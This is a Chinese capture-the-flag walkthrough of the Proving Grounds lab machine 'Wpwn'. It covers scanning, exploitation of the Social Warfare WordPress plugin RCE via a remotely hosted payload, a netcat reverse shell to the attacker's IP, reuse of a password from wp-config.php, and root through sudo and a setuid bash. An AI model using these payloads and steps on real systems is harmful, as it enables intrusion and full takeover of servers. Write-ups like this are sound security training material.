OSCP - Proving Grounds - Wpwn
主要知识点
- 路径爆破
- wordpress插件RCE
- 明文密码
- sudo 提权
具体步骤
信息收集
nmap扫描
比较直接,22和80
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
| 256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_ 256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelnikto扫描
发现了robots.txt和wordpress路径,但是robots.txt毫无价值
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.151.123
+ Target Hostname: 192.168.151.123
+ Target Port: 80
+ Start Time: 2025-04-27 19:23:06 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.
+ /wordpress/wp-admin/: Uncommon header 'x-redirect-by' found, with contents: WordPress.
+ /wordpress/: Drupal Link header found with value: <http://192.168.151.123/wordpress/index.php/wp-json/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ /wordpress/: A Wordpress installation was found.
+ /wordpress/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wordpress/wp-content/uploads/: Directory indexing found.
+ /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information.
+ /wordpress/wp-login.php: Wordpress login found.
+ 8102 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2025-04-27 20:14:56 (GMT-4) (3110 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
wpscan
执行wpsan,在结果中发现了有漏洞的插件social-warfare
[i] Plugin(s) Identified:[+] social-warfare| Location: http://192.168.151.123/wordpress/wp-content/plugins/social-warfare/| Last Updated: 2025-03-18T09:37:00.000Z| [!] The version is out of date, the latest version is 4.5.6|| Found By: Urls In Homepage (Passive Detection)| Confirmed By: Comment (Passive Detection)|| [!] 8 vulnerabilities identified:|| [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Arbitrary Settings Update| Fixed in: 3.5.3| References:| - https://wpscan.com/vulnerability/32085d2d-1235-42b4-baeb-bc43172a4972| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9978| - https://wordpress.org/support/topic/malware-into-new-update/| - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/| - https://threatpost.com/wordpress-plugin-removed-after-zero-day-discovered/143051/| - https://twitter.com/warfareplugins/status/1108826025188909057| - https://www.wordfence.com/blog/2019/03/recent-social-warfare-vulnerability-allowed-remote-code-execution/|
打破边界
获取www-data用户权限
直接参考下面link的描述Social Warfare <= 3.5.2 – Unauthenticated Remote Code Execution (RCE) | Plugin Vulnerabilities
在本地目录下创建payload.txt,内容为
<pre>system('rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.217 443 >/tmp/f')</pre>
本地启动server和nc -nlvp 443后,访问 http://192.168.151.123/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.45.217:8000/payload.txt
便可获得reverse shell,也可以在/var/www路径下获取到第一个flag
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.151.123] 37504
bash: cannot set terminal process group (517): Inappropriate ioctl for device
bash: no job control in this shell
www-data@wpwn:/var/www/html/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
权限提升
获取takis用户权限
接下来上传一个linpeas帮助枚举Linux信息
发现了一个比较有用的数据库配置文件,其中包含一个密码
www-data@wpwn:/tmp$ cat /var/www/html/wordpress/wp-config.php
cat /var/www/html/wordpress/wp-config.php
......
......
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );/** MySQL database username */
define( 'DB_USER', 'wp_user' );/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );/** MySQL hostname */
define( 'DB_HOST', 'localhost' );/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
经过尝试,我们可以得知改密码属于takis用户
www-data@wpwn:/tmp$ su takis
su takis
Password: R3&]vzhHmMn9,:-5
id
uid=1000(takis) gid=1000(takis) groups=1000(takis),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
并且该用户可以无需密码执行sudo
sudo -l
Matching Defaults entries for takis on wpwn:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser takis may run the following commands on wpwn:(ALL) NOPASSWD: ALL
所以提权成功
sudo chmod +s /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18 2019 /bin/bash
/bin/bash -p
id
uid=1000(takis) gid=1000(takis) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(takis)
cat /root/proof.txt
1c7593989911e8bc71c50609491b6166
cat /var/www/local.txt
4c07c5f1165c40d6be363891b297dca4
